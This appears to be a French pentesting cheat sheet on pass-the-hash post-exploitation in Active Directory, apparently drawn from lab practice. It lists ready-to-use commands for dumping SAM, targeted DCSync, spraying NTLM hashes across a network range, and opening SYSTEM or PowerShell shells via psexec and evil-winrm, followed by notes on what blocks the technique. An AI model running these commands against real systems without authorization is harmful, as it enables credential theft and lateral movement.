nxc smb $TARGET -u $USER -p $PASS --samDescription: Dump SAM local : le point de départ classique, surtout si le mot de passe Administrator local est réutilisé sur d'autres machines.
Post-Exploitation
S'authentifier avec un hash NTLM plutôt qu'un mot de passe en clair, sur SMB, WinRM, RDP et MSSQL.
nxc smb $TARGET -u $USER -p $PASS --samDescription: Dump SAM local : le point de départ classique, surtout si le mot de passe Administrator local est réutilisé sur d'autres machines.
secretsdump.py $DOMAIN/$USER:$PASS@$DC -just-dc-user $TARGET_USERDescription: DCSync ciblé : hash NTLM propre d'un compte de domaine, sans toucher LSASS.
nxc smb $CIDR -u $USER -H $NTHASH --local-auth -x 'whoami'Description: Spray du hash sur toute la plage réseau : trouver où le compte local est réutilisé, en une commande.
evil-winrm -i $TARGET -u $USER -H $NTHASHDescription: Shell PowerShell interactif via WinRM avec le hash, sans jamais avoir vu le mot de passe en clair.
psexec.py -hashes :$NTHASH $DOMAIN/$USER@$TARGETDescription: Shell SYSTEM via un service temporaire : bruyant (crée/supprime un service) mais fiable.
xfreerdp /v:$TARGET /u:$USER /pth:$NTHASHDescription: RDP avec le hash sans mot de passe : nécessite Restricted Admin Mode activé côté cible (souvent le cas par défaut sur les configs par défaut d'un lab, pas en prod durcie).
mssqlclient.py -hashes :$NTHASH $DOMAIN/$USER@$TARGETDescription: Authentification MSSQL par PtH : accès direct sans mot de passe si l'auth Windows est utilisée côté SQL.
# PtH nécessite un accès admin local (ou équivalent) sur la cible : ce n'est pas un bypass d'authentification génériqueDescription: Le hash remplace le mot de passe dans le protocole NTLM, mais les droits accordés restent ceux du compte : un hash d'utilisateur standard ne donne pas plus de droits que le mot de passe ne l'aurait fait.
# Protected Users / SMB signing forcé / comptes dans un domaine avec NTLM désactivé -> PtH bloquéDescription: Un compte dans le groupe Protected Users refuse NTLM (Kerberos AES uniquement) : STATUS_ACCOUNT_RESTRICTION à l'authentification, vu en conditions réelles sur HTB Pro Lab Tengu et Dante. Il faut alors passer par Overpass-the-Hash / Pass-the-Ticket.